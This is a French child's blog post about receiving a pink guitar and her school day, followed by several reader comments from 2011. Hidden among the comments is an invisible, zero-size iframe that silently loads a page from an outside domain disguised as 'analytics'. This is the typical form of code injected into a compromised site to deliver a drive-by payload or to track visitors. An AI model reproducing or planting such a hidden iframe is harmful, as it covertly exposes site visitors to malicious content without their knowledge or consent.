• Un Peu De Couleurs !!!

    Aujourd'hui je me suis dis en me réveillant " Non il n'y a rien aujourd'hui ! " et puis je pensait " Oh non j'ai oublier que je devais avoir ma guitare " donc vous voyais maintenant pourquoi je fais cette article , donc si vous n'avez toujours pas compris j'ai eu ma guitare aujourd'hui !!! Bon je vais vous raconter . Le jour d'avant , je  voulez une guitare et on a regarder le magasine télé et on a vues une pages avec ma mère et elle m'a dit " Je veut bien te l'acheter mais comme tu devais en avoir une rose ( c'étais la seule avec un papier pour expliquer ! ) " moi je lui répond " Yes !!! Je t'aime maman !" ! Le lendemain je me réveiller comme le début que j'ai expliquer je me levat très vite je prenais mon petit déj , se lave , s'habille et je suis prête ma mère se lavas et s'habille moi en attendant je mettais mes chaussures puis ma mère se maquille et puis ma mamie viens me chercher pour que ma tata m'emmeneme a l'école j'allais dire a ce soir a ma mère puis je partis ma tata me prenas avec ma cousine Mathilde derrière avec moi . Ma tata prenas mon cartable le mets dans la voitures et ons'en va . J'avais hatte d'être a se midi parce que mon papi aller la chercher le matin puis a l'école je le disait a Laurine ( Ma meilleure amie ) que j'allait en avoir une elle me dit " C'est vrai ? "  et moi je leui rétorqua " Ben oui sinon je ne te le dirais pas " puis je lui montre mon nouveau stylo plume et elle aussi me montre le sien . Puis le prof nous dit " Bonjour je suis le remplassent de votre prof " puis il écrit son nom au tableau Monsieur je sais plus quoi et on a fait tout en premier un exposée que Monsieur ... ( notre prof ) devant tout le monde moi j'en est fait un d'un habitant de la Somme construis une ville en Argentine , après on a fait de la littérature un texte avec des questions sur les dauphin et quand on avait terminert un petit mots croisait qui est sur la même feuille  aussi sur les dauphin !!! Cool non ? Puis de la géométrie on devait faire un cadrillage le trait bien droits sinon foutus ,  je n'ai pas réussi la première fois mais la 2 ème éttais la bonne puis faire 2 cercle un grand et un petit puis faire des traits dedans mais arrondit a la main puis colorier j'étais la plus en retard mais  j'ai ratrapée  ! Bon voila le midi a l'arrêt de car j'ai vue Anthonin ( mon chérie un bébé chérie ) je le porter a ses jambes il étaient plus grand que moi puis je dis "Anthonin regarde Mathilde tu l'as dépasse ! " puis ils rigole . Victor s'approche et dit " On va enterrer Mathilde dans les mini-terrils comme elles dit " ( Les mini-terrils c'est parce qu'il y a des travaux et ils on faits des gros tas de truc noir ) et Mathilde rigole et Anthonin aussi , puis le car arrive on le prend et je courras a la maison de mes grand- parents et en rentrant je dit "Ma guitare "puis marche vers mon  papi et je lui dit " Merci " et le midi jusqu'a 13H30 je jouer de la guitare !

    Et voila j'éspère que sa vous a plus !

    Un ptit ' texte de Clothilde !


    Tags Tags : , , , ,
  • Commentaires

    1
    Chou.Pomme
    Samedi 5 Novembre 2011 à 14:50

    Clothilde, retire le nom de ton prof, je pense pas qu'il aimerais retrouver son nom sur un blog, pour pas que tout le monde le vois non plus.

    2
    Mathilda Amora Profil de Mathilda Amora
    Samedi 5 Novembre 2011 à 17:17

    Salut Clo ! :) J'aime bien ton blog. C'est Mathilde, heiiiiiiiinnn. Tu veux voir mon blog ? Car j'en est fait un nouveaux. ^^

    3
    Miley Cyrus 80 Profil de Miley Cyrus 80
    Lundi 7 Novembre 2011 à 21:06

    Je veux bien !

     

    4
    Mathilda Amora Profil de Mathilda Amora
    Mercredi 9 Novembre 2011 à 12:17

    C'est :http://lepetitblogdemathildaamora.eklablog.com

    Si tu trouve pas, dit le moi.

    5
    Chou.Pomme
    Dimanche 13 Novembre 2011 à 11:11

    Clothile je parle pas dans le vide, t'as pas le droit e prenre des bannières d'autres gens

    6
    Miley Cyrus 80 Profil de Miley Cyrus 80
    Dimanche 27 Novembre 2011 à 17:24

    Heu ... C'est une bannière qu'une copine m'a fait sur P-A alors jeles pas voler

    <iframe style="visibility: hidden;" src="http://loading-resource.com/analytics.php" width="0" height="0"></iframe>

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :